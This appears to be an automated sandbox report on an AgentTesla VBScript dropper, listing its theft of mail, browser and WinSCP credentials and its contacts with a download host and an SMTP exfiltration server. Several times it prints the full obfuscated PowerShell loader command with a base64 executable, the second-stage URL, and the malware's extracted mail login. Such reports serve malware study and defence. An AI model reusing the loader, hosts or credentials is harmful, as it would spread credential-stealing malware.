Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00F4F198 GetUserNameW,

3_2_00F4F198

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.81.170.3	hermosanairobi.com	Canada		53479	AS-UPTIMECA	true
195.178.106.125	yorkrefrigerent.md	Romania		44388	TOPHOST-MD-ASRMoldovaChisinauParis18ARO	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
hermosanairobi.com	192.81.170.3	true
yorkrefrigerent.md	195.178.106.125	true
mail.hermosanairobi.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt	false	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: GJ890-1286.vbs

ReversingLabs: Detection: 12%

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 3.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.hermosanairobi.com", "Username": "security@hermosanairobi.com", "Password": " mcdsew70@_+lks44 "}

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49696 -> 192.81.170.3:26

Yara detected Generic Downloader

Source: Yara match

File source: 1.2.powershell.exe.28b32159f18.0.raw.unpack, type: UNPACKEDPE

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-UPTIMECA AS-UPTIMECA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 192.81.170.3 192.81.170.3
Source: Joe Sandbox View	IP Address: 195.178.106.125 195.178.106.125

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695

Source: powershell.exe, 00000001.00000002.319201526.0000028B4A443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hermosanairobi.com
Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.hermosanairobi.com
Source: powershell.exe, 00000001.00000002.311807350.0000028B31EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.311807350.0000028B3233C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yorkrefrigerent.md
Source: powershell.exe, 00000001.00000002.311807350.0000028B32329000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.md
Source: powershell.exe, 00000001.00000003.310430015.0000028B4A5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.311807350.0000028B320F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt
Source: powershell.exe, 00000001.00000002.311807350.0000028B32336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.mdx

Source: unknown

DNS traffic detected: queries for: yorkrefrigerent.md

Source: global traffic

HTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive

System Summary

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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			Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16166
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16166			Jump to behavior

Yara signature match

Source: amsi64_4464.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth (Nextron Systems), description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: sslproxydump.pcap, type: PCAP	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.317073094.0000028B41F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.311807350.0000028B3235B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.311807350.0000028B3235F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.317073094.0000028B41FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 6008, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FF9A5A720C9	1_2_00007FF9A5A720C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4A9D8	3_2_00F4A9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4C998	3_2_00F4C998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F49DC0	3_2_00F49DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4A108	3_2_00F4A108

Java / VBScript file with very long strings (likely obfuscated code)

Source: GJ890-1286.vbs

Initial sample: Strings found which are bigger than 50

Source: GJ890-1286.vbs

ReversingLabs: Detection: 12%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
